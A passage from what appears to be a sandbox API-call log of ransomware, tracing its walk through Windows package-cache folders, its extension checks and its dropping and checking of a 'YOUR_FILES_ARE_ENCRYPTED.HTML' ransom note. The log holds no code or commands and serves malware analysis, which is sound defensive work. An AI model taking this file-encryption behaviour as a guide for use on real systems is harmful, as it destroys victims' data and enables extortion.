ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafcca738, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b458, dwReserved1=0x6f3f70, cFileName="..", cAlternateFileName="")) returned 1 [0110.490] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18637300, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0x18637300, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xafe76efb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x588124, dwReserved0=0x63b458, dwReserved1=0x6f3f70, cFileName="cab1.cab.F73C8DADC880FD3E1F1E1EF8B3DEA54D938BC56F338A80BEA0AB60C31FC77243", cAlternateFileName="CAB1CA~1.F73")) returned 1 [0110.490] StrStrIW (lpFirst="cab1.cab.F73C8DADC880FD3E1F1E1EF8B3DEA54D938BC56F338A80BEA0AB60C31FC77243", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.490] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.F73C8DADC880FD3E1F1E1EF8B3DEA54D938BC56F338A80BEA0AB60C31FC77243") returned 195 [0110.490] PathFindExtensionW (pszPath="cab1.cab.F73C8DADC880FD3E1F1E1EF8B3DEA54D938BC56F338A80BEA0AB60C31FC77243") returned=".F73C8DADC880FD3E1F1E1EF8B3DEA54D938BC56F338A80BEA0AB60C31FC77243" [0110.490] lstrlenW (lpString=".F73C8DADC880FD3E1F1E1EF8B3DEA54D938BC56F338A80BEA0AB60C31FC77243") returned 65 [0110.490] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb35c4d00, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb35c4d00, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb35c4d00, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63b458, dwReserved1=0x6f3f70, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.490] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.490] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 150 [0110.490] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0110.490] lstrlenW (lpString=".msi") returned 4 [0110.490] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0110.490] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc75095, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafc75095, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafc861ce, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b458, dwReserved1=0x6f3f70, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.490] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc75095, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafc75095, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafc861ce, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b458, dwReserved1=0x6f3f70, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.490] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.490] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 151 [0110.490] GetProcessHeap () returned 0x600000 [0110.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.490] GetProcessHeap () returned 0x600000 [0110.490] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.490] GetProcessHeap () returned 0x600000 [0110.490] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.491] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc89c86, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafc89c86, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafc8d6c5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4016, dwReserved1=0x6f3f68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.491] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc89c86, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafc89c86, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafc8d6c5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4016, dwReserved1=0x6f3f68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.491] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.491] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0110.491] GetProcessHeap () returned 0x600000 [0110.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.492] GetProcessHeap () returned 0x600000 [0110.492] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.492] GetProcessHeap () returned 0x600000 [0110.492] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.492] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc9118a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafc9118a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafc94c8c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.492] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc9118a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafc9118a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafc94c8c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.492] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0110.493] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0110.493] GetProcessHeap () returned 0x600000 [0110.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.493] GetProcessHeap () returned 0x600000 [0110.493] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.493] GetProcessHeap () returned 0x600000 [0110.493] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.494] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c86d4cb, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c893534, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c893534, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", cAlternateFileName="{3C3AA~1")) returned 1 [0110.494] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.494] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 75 [0110.494] GetProcessHeap () returned 0x600000 [0110.494] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.496] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0110.496] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*" [0110.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c86d4cb, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c893534, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafca49ff, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626738 [0110.496] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c86d4cb, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c893534, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafca49ff, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.496] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c893534, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c893534, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xa7a1fb75, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x27e, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0110.496] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.496] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 85 [0110.497] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.497] lstrlenW (lpString=".rsm") returned 4 [0110.497] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.497] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c86d4cb, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c86d4cb, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4ae0cc20, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0110.497] StrStrIW (lpFirst="vcredist_x64.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.497] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 92 [0110.497] PathFindExtensionW (pszPath="vcredist_x64.exe") returned=".exe" [0110.497] lstrlenW (lpString=".exe") returned 4 [0110.497] PathFindExtensionW (pszPath="vcredist_x64.exe") returned=".exe" [0110.497] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc9e826, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafc9e826, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafca8474, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.497] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc9e826, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafc9e826, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafca8474, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.497] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0110.497] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0110.497] GetProcessHeap () returned 0x600000 [0110.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.498] GetProcessHeap () returned 0x600000 [0110.498] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.498] GetProcessHeap () returned 0x600000 [0110.498] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.498] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x64df9047, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{65e650ff-30be-469d-b63a-418d71ea1765}", cAlternateFileName="{65E65~1")) returned 1 [0110.498] StrStrIW (lpFirst="{65e650ff-30be-469d-b63a-418d71ea1765}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.498] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned 75 [0110.498] GetProcessHeap () returned 0x600000 [0110.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.499] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" [0110.499] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*" [0110.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafd1fe65, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.500] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafd1fe65, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.500] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaba9e611, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x320, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0110.500] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.500] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\state.rsm") returned 85 [0110.500] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.500] lstrlenW (lpString=".rsm") returned 4 [0110.500] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.500] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64df9047, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x64df9047, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x625ed0ab, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x9e2e8, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0110.500] StrStrIW (lpFirst="VC_redist.x86.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.500] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\VC_redist.x86.exe") returned 93 [0110.500] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0110.500] lstrlenW (lpString=".exe") returned 4 [0110.500] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0110.500] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafcc5a3c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafcc5a3c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafd2601a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.500] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafcc5a3c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafcc5a3c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafd2601a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.500] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.500] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0110.500] GetProcessHeap () returned 0x600000 [0110.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.501] GetProcessHeap () returned 0x600000 [0110.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.501] GetProcessHeap () returned 0x600000 [0110.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.502] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, 